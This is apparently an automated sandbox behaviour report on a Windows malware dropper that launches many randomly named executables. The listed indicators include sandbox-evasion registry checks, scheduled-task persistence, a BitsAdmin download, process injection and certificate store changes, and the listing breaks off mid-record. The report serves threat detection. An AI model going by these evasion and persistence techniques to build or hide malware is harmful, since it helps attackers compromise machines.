6128 4324 WerFault.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe 2780 4164 WerFault.exe b0Jm51vLbWPyCkE6vTfUOh8q.exe 5560 4324 WerFault.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe 5812 4324 WerFault.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe 5532 4268 WerFault.exe AfGceh7C3AiICU0VpXEapNYr.exe 5404 4324 WerFault.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\UP4ViI_hwH9jVOJQS4l4acdd.exe nsis_installer_2 C:\Users\Admin\Documents\UP4ViI_hwH9jVOJQS4l4acdd.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
xlzHeuwelgGNWi4FQtKYtaLs.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI xlzHeuwelgGNWi4FQtKYtaLs.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI xlzHeuwelgGNWi4FQtKYtaLs.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI xlzHeuwelgGNWi4FQtKYtaLs.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6080 schtasks.exe 5088 schtasks.exe 4788 schtasks.exe 6044 schtasks.exe 4640 schtasks.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4196 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
PXBzV_zEw_pgOR1zKtBuDE1n.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" PXBzV_zEw_pgOR1zKtBuDE1n.exe -
Modifies registry class 3 IoCs
Processes:
Conhost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings Conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance -
Processes:
6ADB8AA23FE92E5441F1156CC3FB949E.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 6ADB8AA23FE92E5441F1156CC3FB949E.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 6ADB8AA23FE92E5441F1156CC3FB949E.exe -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 118 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 119 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 125 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
6ADB8AA23FE92E5441F1156CC3FB949E.exeUP4ViI_hwH9jVOJQS4l4acdd.exexlzHeuwelgGNWi4FQtKYtaLs.exeWerFault.exepid process 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe 5112 xlzHeuwelgGNWi4FQtKYtaLs.exe 5112 xlzHeuwelgGNWi4FQtKYtaLs.exe 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 2716 1052 WerFault.exe 1052 WerFault.exe 1052 WerFault.exe 1052 WerFault.exe 1052 WerFault.exe 1052 WerFault.exe 1052 WerFault.exe 1052 WerFault.exe 1052 WerFault.exe 1052 WerFault.exe 1052 WerFault.exe 1052 WerFault.exe 1052 WerFault.exe 1052 WerFault.exe 1052 WerFault.exe 1052 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2716 -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
xlzHeuwelgGNWi4FQtKYtaLs.exepid process 5112 xlzHeuwelgGNWi4FQtKYtaLs.exe 2716 2716 2716 2716 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
XnOoxUckggjX5foWJMU2gw8A.exeYLyfLdtG4aeto7JDq0eATD13.exeUxSWhTy41TFRKucJet4YNiEK.execBtqBNqwXdb3zhTMvm1NJw2V.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeuLClj5kj3AoL6JIVVR4sepVv.exeWerFault.exeWerFault.exeWerFault.exeX6wMz1CRIeJyms6WRZPsFM_R.exeWerFault.exeWerFault.exe4963167.exeWerFault.exeRbEqteJ5drtD1PHvqibD7reP.exeneVBHdSUrlSjAeQjSg3KZDBw.exeWerFault.exeWerFault.exe8732185.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe4274478.exe2101679.exeWerFault.exeWerFault.exeWerFault.exe2066937.exemd8_8eus.exePXBzV_zEw_pgOR1zKtBuDE1n.exeWerFault.exeWerFault.exe4806551.exeWerFault.exe3270862.exeWerFault.exeWerFault.exetaskkill.exeWerFault.exedescription pid process Token: SeDebugPrivilege 4336 XnOoxUckggjX5foWJMU2gw8A.exe Token: SeDebugPrivilege 4520 YLyfLdtG4aeto7JDq0eATD13.exe Token: SeDebugPrivilege 4156 UxSWhTy41TFRKucJet4YNiEK.exe Token: SeDebugPrivilege 4420 cBtqBNqwXdb3zhTMvm1NJw2V.exe Token: SeRestorePrivilege 2332 WerFault.exe Token: SeBackupPrivilege 2332 WerFault.exe Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeDebugPrivilege 1052 WerFault.exe Token: SeDebugPrivilege 772 WerFault.exe Token: SeDebugPrivilege 808 WerFault.exe Token: SeDebugPrivilege 2332 WerFault.exe Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeDebugPrivilege 4344 uLClj5kj3AoL6JIVVR4sepVv.exe Token: SeDebugPrivilege 4120 WerFault.exe Token: SeDebugPrivilege 4708 WerFault.exe Token: SeDebugPrivilege 2196 WerFault.exe Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeDebugPrivilege 4380 X6wMz1CRIeJyms6WRZPsFM_R.exe Token: SeDebugPrivilege 4484 WerFault.exe Token: SeDebugPrivilege 4768 WerFault.exe Token: SeDebugPrivilege 1460 4963167.exe Token: SeDebugPrivilege 4568 WerFault.exe Token: SeDebugPrivilege 4232 RbEqteJ5drtD1PHvqibD7reP.exe Token: SeDebugPrivilege 4240 neVBHdSUrlSjAeQjSg3KZDBw.exe Token: SeDebugPrivilege 1496 WerFault.exe Token: SeDebugPrivilege 4532 WerFault.exe Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeDebugPrivilege 4636 8732185.exe Token: SeDebugPrivilege 5480 WerFault.exe Token: SeDebugPrivilege 5520 WerFault.exe Token: SeDebugPrivilege 5536 WerFault.exe Token: SeDebugPrivilege 5552 WerFault.exe Token: SeDebugPrivilege 5304 4274478.exe Token: SeDebugPrivilege 5172 2101679.exe Token: SeDebugPrivilege 4532 WerFault.exe Token: SeDebugPrivilege 2172 WerFault.exe Token: SeDebugPrivilege 5672 WerFault.exe Token: SeDebugPrivilege 5744 WerFault.exe Token: SeDebugPrivilege 4696 2066937.exe Token: SeManageVolumePrivilege 2736 md8_8eus.exe Token: SeDebugPrivilege 4248 PXBzV_zEw_pgOR1zKtBuDE1n.exe Token: SeDebugPrivilege 6016 WerFault.exe Token: SeDebugPrivilege 4760 WerFault.exe Token: SeDebugPrivilege 5380 4806551.exe Token: SeDebugPrivilege 2204 WerFault.exe Token: SeDebugPrivilege 4356 3270862.exe Token: SeDebugPrivilege 4468 WerFault.exe Token: SeDebugPrivilege 5560 WerFault.exe Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 Token: SeDebugPrivilege 4196 taskkill.exe Token: SeDebugPrivilege 1260 WerFault.exe Token: SeShutdownPrivilege 2716 Token: SeCreatePagefilePrivilege 2716 -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vwBuTIRxRb5SNSqZ3XF8NBD2.tmppid process 4300 vwBuTIRxRb5SNSqZ3XF8NBD2.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Pb17tPXfuEqViJcCjKmT7yDb.exepid process 4476 Pb17tPXfuEqViJcCjKmT7yDb.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6ADB8AA23FE92E5441F1156CC3FB949E.exexlzHeuwelgGNWi4FQtKYtaLs.exedescription pid process target process PID 3164 wrote to memory of 4144 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe xlzHeuwelgGNWi4FQtKYtaLs.exe PID 3164 wrote to memory of 4144 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe xlzHeuwelgGNWi4FQtKYtaLs.exe PID 3164 wrote to memory of 4144 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe xlzHeuwelgGNWi4FQtKYtaLs.exe PID 3164 wrote to memory of 4164 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe b0Jm51vLbWPyCkE6vTfUOh8q.exe PID 3164 wrote to memory of 4164 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe b0Jm51vLbWPyCkE6vTfUOh8q.exe PID 3164 wrote to memory of 4164 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe b0Jm51vLbWPyCkE6vTfUOh8q.exe PID 3164 wrote to memory of 4156 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe UxSWhTy41TFRKucJet4YNiEK.exe PID 3164 wrote to memory of 4156 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe UxSWhTy41TFRKucJet4YNiEK.exe PID 3164 wrote to memory of 4180 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe Pb17tPXfuEqViJcCjKmT7yDb.exe PID 3164 wrote to memory of 4180 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe Pb17tPXfuEqViJcCjKmT7yDb.exe PID 3164 wrote to memory of 4180 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe Pb17tPXfuEqViJcCjKmT7yDb.exe PID 3164 wrote to memory of 4192 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe hpG_QsrS8jyUhxZBwiU7DK_t.exe PID 3164 wrote to memory of 4192 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe hpG_QsrS8jyUhxZBwiU7DK_t.exe PID 3164 wrote to memory of 4192 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe hpG_QsrS8jyUhxZBwiU7DK_t.exe PID 3164 wrote to memory of 4268 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe AfGceh7C3AiICU0VpXEapNYr.exe PID 3164 wrote to memory of 4268 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe AfGceh7C3AiICU0VpXEapNYr.exe PID 3164 wrote to memory of 4260 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe RbEqteJ5drtD1PHvqibD7reP.exe PID 3164 wrote to memory of 4260 3164 6ADB8AA23FE92E5441F1156CC3FB949E.exe RbEqteJ5drtD1PHvqibD7reP.exe PID 3164 wrote to memory of 4260 3164 